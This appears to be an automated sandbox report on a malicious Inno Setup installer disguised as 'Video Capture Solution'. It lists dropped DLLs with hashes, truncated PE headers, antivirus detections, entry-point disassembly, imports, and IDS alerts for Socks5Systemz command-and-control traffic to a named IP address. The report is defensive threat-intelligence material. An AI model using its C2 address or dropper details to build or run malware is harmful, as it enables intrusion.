                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):645592
                                                        Entropy (8bit):6.50414583238337
                                                        Encrypted:false
                                                        SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                        MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                        SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                        SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                        SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:MS Windows HtmlHelp Data
                                                        Category:dropped
                                                        Size (bytes):78183
                                                        Entropy (8bit):7.692742945771669
                                                        Encrypted:false
                                                        SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                        MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                        SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                        SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                        SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                        Malicious:false
                                                        Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):265728
                                                        Entropy (8bit):6.4472652154517345
                                                        Encrypted:false
                                                        SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                        MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                        SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                        SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                        SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..=...........!................`;.......................................P.......................'..............p...o.......d.... .......................0..\.......................................................4............................text...k........................... ..`.rdata..............................@..@.data....9.......0..................@....idata..............................@....rsrc........ ......................@..@.reloc..T....0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):176128
                                                        Entropy (8bit):6.204917493416147
                                                        Encrypted:false
                                                        SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                        MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                        SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                        SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                        SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):445440
                                                        Entropy (8bit):6.439135831549689
                                                        Encrypted:false
                                                        SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                        MD5:CAC7E17311797C5471733638C0DC1F01
                                                        SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                        SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                        SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):499712
                                                        Entropy (8bit):6.414789978441117
                                                        Encrypted:false
                                                        SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                        MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                        SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                        SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                        SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):348160
                                                        Entropy (8bit):6.542655141037356
                                                        Encrypted:false
                                                        SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                        MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                        SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                        SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                        SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):645592
                                                        Entropy (8bit):6.50414583238337
                                                        Encrypted:false
                                                        SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                        MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                        SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                        SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                        SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):715253
                                                        Entropy (8bit):6.514725891252045
                                                        Encrypted:false
                                                        SSDEEP:12288:+/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyRvh1K8xyF8:+kqZ1G7DMvrP537dzHsA6hcHGbH3Ephx
                                                        MD5:BBA0FB9821CB5144F08CB5E1B6A199D8
                                                        SHA1:2FD483B6CE0714D354C35068C52EF2FC6329A5D8
                                                        SHA-256:507CEC881D67923B2830557FF8E47CD8CEE06295F33D025C60FCBFC717D00318
                                                        SHA-512:AAED6B019AF80DED7262D72C17DF88FE0D99546FF7A894A41DB59AC56D774E69455A7085527273A220B2814D8286937847CA154688756A3A430F36F13645A929
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:InnoSetup Log Video Capture Solution, version 0x30, 5023 bytes, 142233\user, "C:\Users\user\AppData\Local\Video Capture Solution 1.33"
                                                        Category:dropped
                                                        Size (bytes):5023
                                                        Entropy (8bit):4.778251942505703
                                                        Encrypted:false
                                                        SSDEEP:96:2nWa8n8wprQZSsp9A+eOIhFm17ICSss/LnDj4G:2nWa8nbprQZSYHIhqICSsAnN
                                                        MD5:618990E02A2A401B2771EFEB0E3B1CB6
                                                        SHA1:82225DFD08F5F462B50FA969721238AB8402D707
                                                        SHA-256:0F7C69854742CFE558B326597FBD643A227893F246EB8CEA5D6D13607013ACBE
                                                        SHA-512:837E7320CDFF7E2AA44BEAC5666D160FF44E0B8371DC3C897E96535F7F2C457A8ABA0D80DEC4626BAC4E1382C618253FEF0357588D82B37DAAC2D436EB7348AE
                                                        Malicious:false
                                                        Preview:Inno Setup Uninstall Log (b)....................................Video Capture Solution..........................................................................................................Video Capture Solution..........................................................................................................0...........%..................................................................................................................R........O.........X....142233.user8C:\Users\user\AppData\Local\Video Capture Solution 1.33...........4...... .....I......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dl
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):715253
                                                        Entropy (8bit):6.514725891252045
                                                        Encrypted:false
                                                        SSDEEP:12288:+/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyRvh1K8xyF8:+kqZ1G7DMvrP537dzHsA6hcHGbH3Ephx
                                                        MD5:BBA0FB9821CB5144F08CB5E1B6A199D8
                                                        SHA1:2FD483B6CE0714D354C35068C52EF2FC6329A5D8
                                                        SHA-256:507CEC881D67923B2830557FF8E47CD8CEE06295F33D025C60FCBFC717D00318
                                                        SHA-512:AAED6B019AF80DED7262D72C17DF88FE0D99546FF7A894A41DB59AC56D774E69455A7085527273A220B2814D8286937847CA154688756A3A430F36F13645A929
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:modified
                                                        Size (bytes):3281038
                                                        Entropy (8bit):6.6109330082563496
                                                        Encrypted:false
                                                        SSDEEP:98304:hHY4bl5znLaEGzUjIX24RJ4IB//bR6SodyUfalD:hH9l5znLaEGK/Sody9lD
                                                        MD5:F980DB1C4941DE93EA4A88045D20F6D5
                                                        SHA1:990341E89AE748B370CCF38CA167FF9A8D548256
                                                        SHA-256:0325826FD16CEC2AB3F6C56C29B800EBC9E4C33C686BA1D17871B7E3C3091479
                                                        SHA-512:50B31F989AF64CA6EEF354CDAB52041FE0EB5EF3D3BB57295AE9130EE7D50C1172DE921381523E9388524050E1DBB1B1BE3F0D81A7321E9E43CA68C124B67C9C
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 79%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L..._..L.....................T...................@..........................p2......z2.....................................T...........`...............................................................................|..........................._rste_2............................. ..`_rstf_2.............................@..@_rstg_2..d... ...0..................@....rsrc................6..............@..@_rsth_2...!..p.... .................`...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.998110037622252
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 98.86%
                                                        • Inno Setup installer (109748/4) 1.08%
                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        File name:AbC0LBkVhr.exe
                                                        File size:3'774'004 bytes
                                                        MD5:038c7d5697bfbe553717357809e621bf
                                                        SHA1:1264a6bc374db430ce8007b99cc6b10ad0f14c9e
                                                        SHA256:71f8685ec48d0623886c9cf10bc1bc806586904c939aa28d20f9a253d45b623f
                                                        SHA512:5efd09421e9d4fbd295f1837416c4c6221dd658b95133ae6c9adfbdec803ae7f0d78404e43352db35f570ea3330850a7a93463452435e3980c59e7f99978e4c9
                                                        SSDEEP:98304:Nq7HAHRAuq+jR377VPm3v9exaG/ak4Rac/8fEUbEOUJS:M7yAuq+jR37thxaG/waU+ZEOj
                                                        TLSH:18063341ECE48172D040D9741E189449503BBE338B7D20A56EBD06EDEFA3A63C56FAED
                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                        Icon Hash:2d2e3797b32b2b99
                                                        Entrypoint:0x409c40
                                                        Entrypoint Section:CODE
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:1
                                                        OS Version Minor:0
                                                        File Version Major:1
                                                        File Version Minor:0
                                                        Subsystem Version Major:1
                                                        Subsystem Version Minor:0
                                                        Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                        Instruction
                                                        push ebp
                                                        mov ebp, esp
                                                        add esp, FFFFFFC4h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        xor eax, eax
                                                        mov dword ptr [ebp-10h], eax
                                                        mov dword ptr [ebp-24h], eax
                                                        call 00007FD8DCCDA84Bh
                                                        call 00007FD8DCCDBA52h
                                                        call 00007FD8DCCDBCE1h
                                                        call 00007FD8DCCDDD18h
                                                        call 00007FD8DCCDDD5Fh
                                                        call 00007FD8DCCE068Eh
                                                        call 00007FD8DCCE07F5h
                                                        xor eax, eax
                                                        push ebp
                                                        push 0040A2FCh
                                                        push dword ptr fs:[eax]
                                                        mov dword ptr fs:[eax], esp
                                                        xor edx, edx
                                                        push ebp
                                                        push 0040A2C5h
                                                        push dword ptr fs:[edx]
                                                        mov dword ptr fs:[edx], esp
                                                        mov eax, dword ptr [0040C014h]
                                                        call 00007FD8DCCE125Bh
                                                        call 00007FD8DCCE0E8Eh
                                                        lea edx, dword ptr [ebp-10h]
                                                        xor eax, eax
                                                        call 00007FD8DCCDE348h
                                                        mov edx, dword ptr [ebp-10h]
                                                        mov eax, 0040CE24h
                                                        call 00007FD8DCCDA8F7h
                                                        push 00000002h
                                                        push 00000000h
                                                        push 00000001h
                                                        mov ecx, dword ptr [0040CE24h]
                                                        mov dl, 01h
                                                        mov eax, 0040738Ch
                                                        call 00007FD8DCCDEBD7h
                                                        mov dword ptr [0040CE28h], eax
                                                        xor edx, edx
                                                        push ebp
                                                        push 0040A27Dh
                                                        push dword ptr fs:[edx]
                                                        mov dword ptr fs:[edx], esp
                                                        call 00007FD8DCCE12CBh
                                                        mov dword ptr [0040CE30h], eax
                                                        mov eax, dword ptr [0040CE30h]
                                                        cmp dword ptr [eax+0Ch], 01h
                                                        jne 00007FD8DCCE140Ah
                                                        mov eax, dword ptr [0040CE30h]
                                                        mov edx, 00000028h
                                                        call 00007FD8DCCDEFD8h
                                                        mov edx, dword ptr [00000030h]
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        CODE0x10000x93640x94002c410dfc3efd04d9b69c35c70921424eFalse0.6147856841216216data6.560885192755103IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        DATA0xb0000x24c0x400d5ea23d4ecf110fd2591314cbaa84278False0.310546875data2.7390956346874638IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        BSS0xc0000xe880x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                        .reloc0x100000x8b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                        .rsrc0x110000x2c000x2c000f321b182ec9b63ff2294e55283c47f7False0.3234197443181818data4.470502442666072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                        RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                        RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                        RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                        RT_STRING0x125740x2f2data0.35543766578249336
                                                        RT_STRING0x128680x30cdata0.3871794871794872
                                                        RT_STRING0x12b740x2cedata0.42618384401114207
                                                        RT_STRING0x12e440x68data0.75
                                                        RT_STRING0x12eac0xb4data0.6277777777777778
                                                        RT_STRING0x12f600xaedata0.5344827586206896
                                                        RT_RCDATA0x130100x2cdata1.1818181818181819
                                                        RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                        RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States0.2814569536423841
                                                        RT_MANIFEST0x135340x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093
                                                        DLLImport
                                                        kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                        user32.dllMessageBoxA
                                                        oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                        kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                        user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                        comctl32.dllInitCommonControls
                                                        advapi32.dllAdjustTokenPrivileges
                                                        Language of compilation systemCountry where language is spokenMap
                                                        DutchNetherlands
                                                        EnglishUnited States
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-12-16T14:53:00.972080+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449737147.45.126.3180TCP
                                                        2024-12-16T14:53:00.972080+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449737147.45.126.3180TCP
                                                        2024-12-16T14:53:04.945392+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449737147.45.126.3180TCP
                                                        2024-12-16T14:53:04.945392+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449737147.45.126.3180TCP
                                                        2024-12-16T14:53:06.672139+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449750147.45.126.3180TCP
